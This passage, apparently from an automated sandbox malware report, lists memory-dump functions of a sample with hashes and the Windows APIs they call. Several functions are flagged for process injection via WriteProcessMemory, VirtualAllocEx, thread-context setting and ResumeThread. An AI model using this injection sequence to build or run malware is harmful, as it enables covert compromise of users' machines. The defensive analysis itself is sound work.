Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: _malloc
String ID:
API String ID: 1579825452-0
Opcode ID: fca23fa3ba556f07a8b988ec60a27fd8658a0a842c2ddd2f96af9101755019ce
Instruction ID: 0136ca2b4f9bdd130b8b017ffe2eba387c4552eca4c1bfaaa611c230980c19c0
Opcode Fuzzy Hash: fca23fa3ba556f07a8b988ec60a27fd8658a0a842c2ddd2f96af9101755019ce
Instruction Fuzzy Hash: 5C81C4F19097808FEB209FA4898176EB7F0AF41308F3449BDD159ABB91D7B584498BD3

Function 07112819 Relevance: 1.6, APIs: 1, Instructions: 119injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 071128F5

Memory Dump Source

Source File: 00000000.00000002.2014233130.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7110000_SecuriteInfo.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: e73792d0059a0387d36f6110bcb2757ffce108a526ded451d4fe08e6e7d6244b
Instruction ID: 472c3e45675fe88619f4dc6c54a6bb592eaa7c6c2d5c738d16eca237c61f6c2d
Opcode Fuzzy Hash: e73792d0059a0387d36f6110bcb2757ffce108a526ded451d4fe08e6e7d6244b
Instruction Fuzzy Hash: 9D4159B5D002589FDB00CFA9D984ADEFBF5BF49314F14902AE818BB250D375A945CB64

Function 07112820 Relevance: 1.6, APIs: 1, Instructions: 115injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 071128F5

Memory Dump Source

Source File: 00000000.00000002.2014233130.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7110000_SecuriteInfo.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: a8870b26563c3e268c93377f59e2a7777dc7b3977d298ece84a8d892e1999ee5
Instruction ID: 988e97b8f646abdf904b075a027000fe25db5bb4de253b862e396ffcba89081d
Opcode Fuzzy Hash: a8870b26563c3e268c93377f59e2a7777dc7b3977d298ece84a8d892e1999ee5
Instruction Fuzzy Hash: 704166B5D002589FDB00CFA9D984AAEFBF5BF49310F24902AE818BB250D375A945CF64

Function 071126F9 Relevance: 1.6, APIs: 1, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 071127AC

Memory Dump Source

Source File: 00000000.00000002.2014233130.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7110000_SecuriteInfo.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 34a836f03e98c3386d269763b6cce0cc589762e2e93abfb0024973cb9a41a26a
Instruction ID: 67cf2c10b91f4c1cd3aa67d339128234da56b28b8bcff1957c5810108f571620
Opcode Fuzzy Hash: 34a836f03e98c3386d269763b6cce0cc589762e2e93abfb0024973cb9a41a26a
Instruction Fuzzy Hash: 594166B8D012589FCB10CFA9D984A9EFBB5BF19310F24942AE818BB210D335A941CB64

Function 07112700 Relevance: 1.6, APIs: 1, Instructions: 100memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 071127AC

Memory Dump Source

Source File: 00000000.00000002.2014233130.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7110000_SecuriteInfo.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 77754594c8b998c0bb09b1f740c6f93469978c9f47877010b58b75ebaba7d99b
Instruction ID: 08cbaccc0d214c3db2688a280445b2551ae66e5ee6087e265b56b35c15059abf
Opcode Fuzzy Hash: 77754594c8b998c0bb09b1f740c6f93469978c9f47877010b58b75ebaba7d99b
Instruction Fuzzy Hash: E63155B9D012589FCF10CFA9D984A9EFBB5BF19310F14942AE818BB210D335A941CB64

Function 6CEA7140 Relevance: 1.6, APIs: 1, Instructions: 92COMMON

Download Yara Rule

APIs

Part of subcall function 6CEC2820: _malloc.LIBCMT ref: 6CEC2871

std::tr1::_Xweak.LIBCPMT ref: 6CEA71D2

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Xweak_mallocstd::tr1::_
String ID:
API String ID: 4085767713-0
Opcode ID: 6016ad457b092b87b3217fe3303ac86a3d144d5c83791e0de427226055831301
Instruction ID: 0b9eb37dbe970a30427a05a38e3bd5f1e187f9cd6a706196598d38963d410902
Opcode Fuzzy Hash: 6016ad457b092b87b3217fe3303ac86a3d144d5c83791e0de427226055831301
Instruction Fuzzy Hash: 7031A5B5A0434A9FCB10CFA5C8C0AABB7F5FF48208F20861DE8559B745D331E906CB50

Function 071125F9 Relevance: 1.6, APIs: 1, Instructions: 85threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0711268B

Memory Dump Source

Source File: 00000000.00000002.2014233130.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7110000_SecuriteInfo.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 7e93fdb59488141937b7667b563f84a70e5c246c0700a3f8ca10fc55cfed343d
Instruction ID: ee79b16b26b647b1be01caac3a8e5e7221b00b79529f0b4dc9949bdcc0e754f2
Opcode Fuzzy Hash: 7e93fdb59488141937b7667b563f84a70e5c246c0700a3f8ca10fc55cfed343d
Instruction Fuzzy Hash: 4931BAB4D01258AFCB10CFA9D584ADEFBF4BF09310F24846AE818B7250D339A944CF64

Function 07112600 Relevance: 1.6, APIs: 1, Instructions: 81threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0711268B

Memory Dump Source

Source File: 00000000.00000002.2014233130.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7110000_SecuriteInfo.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 73d2ff708cd1f462d14f74a154eac647255a78a36ad8c27574b58a253d267850
Instruction ID: e8cd2686c8f798ac540a43cadbc4b95af876f95e9085463a669ec4b49041ef7a
Opcode Fuzzy Hash: 73d2ff708cd1f462d14f74a154eac647255a78a36ad8c27574b58a253d267850
Instruction Fuzzy Hash: 3E3199B4D012589FCB10CFA9D584ADEFBF4BF09310F24942AE818B7250D778AA44CF64

Function 071129C8 Relevance: 1.6, APIs: 1, Instructions: 76threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 07112A4D

Memory Dump Source

Source File: 00000000.00000002.2014233130.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7110000_SecuriteInfo.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: d3d42234be4212a5cfc17bc9817496d0b66a8d6402a09dd6004bde1c12b328a6
Instruction ID: 088d1020b6e36a2844d09884fb5d2d40ccfc0d6c75ce49a5e175fa5c052fac6d
Opcode Fuzzy Hash: d3d42234be4212a5cfc17bc9817496d0b66a8d6402a09dd6004bde1c12b328a6
Instruction Fuzzy Hash: E73199B4D01258AFCB10DFA9E984A9EFBB4BF49310F14902AE818B7350D774A941CFA4

Function 071129D0 Relevance: 1.6, APIs: 1, Instructions: 71threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 07112A4D

Memory Dump Source

Source File: 00000000.00000002.2014233130.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7110000_SecuriteInfo.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 1cae945f8d34c182684fe812ed888bf1c3902bf5dcdd6c4afee9351095d20561
Instruction ID: 1a23badc02587d08d805a2942d6bc5f0dbd9c3f01dbcd555dfcba94083e48e74
Opcode Fuzzy Hash: 1cae945f8d34c182684fe812ed888bf1c3902bf5dcdd6c4afee9351095d20561
Instruction Fuzzy Hash: DE3189B4D012589FCB10CFA9E584A9EFBF4BF49310F14942AE818B7350D775A941CFA4

Function 6CEBEA40 Relevance: 1.5, APIs: 1, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6CEF9BB5: _malloc.LIBCMT ref: 6CEF9BCF

SysAllocString.OLEAUT32 ref: 6CEBEA8D

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: AllocString_malloc
String ID:
API String ID: 959018026-0
Opcode ID: 86f756117719c4d73482e241b04c595c3f95628dcb8917a40a44a4cb647318cc
Instruction ID: 2ff9b8f6d1fb34281812fac156bf93e8016dd04786aa8b4a65231d0278427150
Opcode Fuzzy Hash: 86f756117719c4d73482e241b04c595c3f95628dcb8917a40a44a4cb647318cc
Instruction Fuzzy Hash: F3019271905B55EBD311CF94C900BAAB7F8EB05B28F21435AEC65B7B80D7B599008AD1

Function 6CEF9D21 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 6CEFE8DC

Part of subcall function 6CEF9BB5: _malloc.LIBCMT ref: 6CEF9BCF

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: H_prolog3_catch_malloc
String ID:
API String ID: 529455676-0
Opcode ID: 17381d68f601cb1386cc00e774ed88038bd6e13ab8ef608b048a69616edfd785
Instruction ID: 6f0bc17617864ac4b1825d5d435fb2353785c2266ae97e88552273ced612014d
Opcode Fuzzy Hash: 17381d68f601cb1386cc00e774ed88038bd6e13ab8ef608b048a69616edfd785
Instruction Fuzzy Hash: 4FD05E3161820897CB51BF988405BAD7BB0AB81325F700069E4187BB80DA719A0AC79A

Function 6CEFA510 Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

___security_init_cookie.LIBCMT ref: 6CEFA510

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ___security_init_cookie
String ID:
API String ID: 3657697845-0
Opcode ID: 27b748a9c275510458f0068f842967d98f7d0f67ac18c1338cd75791cb2cbf1f
Instruction ID: 984191392ad4ead38540174fa55419828049f4c6dce1d6bc3584528df4a0cbf3
Opcode Fuzzy Hash: 27b748a9c275510458f0068f842967d98f7d0f67ac18c1338cd75791cb2cbf1f
Instruction Fuzzy Hash: 13C09B351443489F8B04CF10F440CDE3775AB94234730D11DFC681AB509B319966D560

Function 02A80CB2 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1987300613.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2a80000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82db8a2b20fc54f9637faaa3550691063f7a1983508af9fca88c62c47c3e0b30
Instruction ID: 4484d90295b75ff51959e54c9862a77b95cba8a9fd59a329fd51212e053388e3
Opcode Fuzzy Hash: 82db8a2b20fc54f9637faaa3550691063f7a1983508af9fca88c62c47c3e0b30
Instruction Fuzzy Hash: 4251C874E01219CFCB04DFA9D984AADBBB6FF88300F148529D809A7365DB359D4ACF61

Function 02A80CC0 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1987300613.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2a80000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 705ccafd9eeef34fb644d9e84b6c603eef182ba31bfe0de889a7882c53279a48
Instruction ID: db680c3b8317d3d4116eebda261096bb5613d173fab004466ebb157687923cc4
Opcode Fuzzy Hash: 705ccafd9eeef34fb644d9e84b6c603eef182ba31bfe0de889a7882c53279a48
Instruction Fuzzy Hash: 9551D874E00219CFCB04DFA9D984AADBBB6FF88300F148529D809A7365DB34AD45CF51

Function 02A80BC1 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1987300613.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2a80000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1d2da5975b06286f08af5a4994a7034df810a8b99c6bcbaac0074b77057e036
Instruction ID: 3cf477ebb56a52968dba8b82257cde2f10250a5ac2fa4f811a684649cf5da25f
Opcode Fuzzy Hash: d1d2da5975b06286f08af5a4994a7034df810a8b99c6bcbaac0074b77057e036
Instruction Fuzzy Hash: 602105B4D05208CFDB04DFA9D8446EEBBB6EF8D301F10846AD50AB3250EB755A89CF61

Function 00D7D964 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1986678619.0000000000D7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d7d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ffddb4ac9c7dafb7f61ca207bd5e33944aa0d1990a1463be8d3c2ba5916c101
Instruction ID: 7d91b4c0739dff26118de8d31d37b12459f07eb134f607dc71c151982f83e310
Opcode Fuzzy Hash: 8ffddb4ac9c7dafb7f61ca207bd5e33944aa0d1990a1463be8d3c2ba5916c101
Instruction Fuzzy Hash: 7621F271504244DFCB05DF14D980B26BB76FF98314F28C569E94D1B256D33AD80ADBB2

Function 06EE2516 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2013627537.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ee0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cbf1adafc4e2d22b671631f9977d255d02474b9eb9d218e3e7d285aa9df12f8
Instruction ID: cbd88d61521ad36dba24fd1daae4d31991c767039c7a42ebf6470aecde60b04b
Opcode Fuzzy Hash: 4cbf1adafc4e2d22b671631f9977d255d02474b9eb9d218e3e7d285aa9df12f8
Instruction Fuzzy Hash: 1F21EF30A102068FCB54DF68C96069E7BF6AF84300F21CA19D516CB398DF34ED42CB81

Function 00D7DA4C Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1986678619.0000000000D7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d7d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db49db7fa6f2316c19c6f388fe958e3792c47995f8c4474ee50f798fb05fb215
Instruction ID: 0d722652727447ae4e07d0c99c8475d0fb725d8e518956e1b112f8f771741300
Opcode Fuzzy Hash: db49db7fa6f2316c19c6f388fe958e3792c47995f8c4474ee50f798fb05fb215
Instruction Fuzzy Hash: 0A21F2B1508344DFCB05DF24D980B26BB76FFA4324F28C569E90D0B256D33AD806D6B1

Function 00D7D44C Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1986678619.0000000000D7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d7d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a56ed77c89f19a887012d558364f60a68aa9a0ce34c8bfdf89a4fe72b2f607c2
Instruction ID: 378b15b1f75e6bd5432a523d8f3233b9059f4c3ba2dd8daa72eaf8b0ca3d2f33
Opcode Fuzzy Hash: a56ed77c89f19a887012d558364f60a68aa9a0ce34c8bfdf89a4fe72b2f607c2
Instruction Fuzzy Hash: 71210171504200EFDB14DF14D9C4B26BF76EF84328F24C669D84D0B255D33AE846C6B2

Function 02A89820 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1987300613.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2a80000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49dabd77e4610cc40c54a33eca3144912aea451e85bb0d40ee909d54066a2a91
Instruction ID: b59302c9a3bfc0b0db23461915a6787c79b34e938ae03cd21db544fef99d61ed
Opcode Fuzzy Hash: 49dabd77e4610cc40c54a33eca3144912aea451e85bb0d40ee909d54066a2a91
Instruction Fuzzy Hash: 8D21E574E0420ADFCB04EFA9D5846BEBBF6BB48304F148569D418A7355DB349981CF91

Function 06EE0847 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2013627537.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ee0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7c473f4e7b3201458dd95f2738578505d4c203c87b0857b21069be246f3f9e7
Instruction ID: 67dfd275cbaf9c6b4023d1ca3cb7d5fb4681265788c8315affa37a9301db1588
Opcode Fuzzy Hash: a7c473f4e7b3201458dd95f2738578505d4c203c87b0857b21069be246f3f9e7
Instruction Fuzzy Hash: 2F118F303082545FC745EB68D8A8D6E7FF9EF8A21074540EAE549CB3B3DB219C05C761

Function 00D7D95F Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1986678619.0000000000D7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d7d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 523fabb44b02fcaa1064eae8d9a10a48e2cd5a800d24befd30ec8c8c27650fb1
Instruction ID: acb334029d7d2359caf37fb7fcb3e49a3223770537b7a8891ae1dcab9495986d
Opcode Fuzzy Hash: 523fabb44b02fcaa1064eae8d9a10a48e2cd5a800d24befd30ec8c8c27650fb1
Instruction Fuzzy Hash: 8D11D076508280CFCB12CF10D9C4B16BF72FF94314F28C6A9D8490B656C33AD81ACBA2

Function 00D7DA47 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1986678619.0000000000D7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d7d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f2dc214fb3b67dee6d63525546fcd79b48668cd63b1e3b0b14567c0ac11da0e
Instruction ID: c8d134bcd598817bc466957384508b89d2028eae0dc34c72b3d48705244846df
Opcode Fuzzy Hash: 8f2dc214fb3b67dee6d63525546fcd79b48668cd63b1e3b0b14567c0ac11da0e
Instruction Fuzzy Hash: 0E119076504280CFDB12CF14D5C4B16BF72FB94314F28C6A9D9494B656C33AD81ACBA2

Function 00D7D447 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1986678619.0000000000D7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d7d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b4c623aaf12d799d01dfa0934b93cccf601b23327cf73bb2393620fe977b88f
Instruction ID: cbb80950ec7c3366c2cd688547d9ca7b84c431608f603c475f03d07ea42e0579
Opcode Fuzzy Hash: 7b4c623aaf12d799d01dfa0934b93cccf601b23327cf73bb2393620fe977b88f
Instruction Fuzzy Hash: 8711C176504280DFDB11CF14D5C4B19BF72FB94328F28C6A9D84D4B656D33AE84ACBA2

Function 06EE0868 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2013627537.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ee0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4a5b6954e2df8efd030a706b26df0a3864b768a77bd1be21a1f9dfd683a7bbf
Instruction ID: f4974827e3d33b36fb1da994a2fbcbdd782cbe82ca8007efaf53c0b41e76d130
Opcode Fuzzy Hash: d4a5b6954e2df8efd030a706b26df0a3864b768a77bd1be21a1f9dfd683a7bbf
Instruction Fuzzy Hash: 15014C353001149F8748EF6DE898C2E7BEAFF8961075144A9E50ACB3B2DF71EC018B64

Function 02A88A78 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1987300613.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2a80000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ac77be231828ba21783c71cf38d5020d05a3f2ec246f7224a99c852d50945a7
Instruction ID: 31d6785bd70b8181be2cc82343e976d81b6554ab964261476cbcf47439c47c50
Opcode Fuzzy Hash: 0ac77be231828ba21783c71cf38d5020d05a3f2ec246f7224a99c852d50945a7
Instruction Fuzzy Hash: 8011F5B8D04209CFCB04EFA9D9595AEBBF5BB88300F508465D919A3351DF385901CFA1

Function 02A80B10 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1987300613.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2a80000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d90b90785da646dc1ce52ad2eba92773261e98f7ffca82ef17247d07f69a0c3a
Instruction ID: e0763cafb7358cc6144ee68275f88536bd1e09a4bbdce3db70d72a70e8fac99a
Opcode Fuzzy Hash: d90b90785da646dc1ce52ad2eba92773261e98f7ffca82ef17247d07f69a0c3a
Instruction Fuzzy Hash: 62014C70C496499ECB40FFB988492AEBFF4BF4A208F0485AAC529D3212EB744659CF51

Function 00D6D149 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1986597710.0000000000D6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6d000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 608c35a2111c4801ea16750143f6e6725b294c8dcd4710a24b7b3c48eb55d415
Instruction ID: d51a79b1a9de8c69aec404105c6eeadb5f6d6ef6782984e3cefeea212a60ecbb
Opcode Fuzzy Hash: 608c35a2111c4801ea16750143f6e6725b294c8dcd4710a24b7b3c48eb55d415
Instruction Fuzzy Hash: B9012B71A043409BE7208B19DD84B67BF9DEF57320F1CC52AED490A286C2BDD840CA71

Function 02A80B20 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1987300613.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2a80000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7959af5dc9509dfca67f8c8c13ff997183baa9d4e81ed01b21cf34b42d676424
Instruction ID: 3122a8121878bc84010dd4c4c5f6f8006d64b285d70f4f799263dcd050216fad
Opcode Fuzzy Hash: 7959af5dc9509dfca67f8c8c13ff997183baa9d4e81ed01b21cf34b42d676424
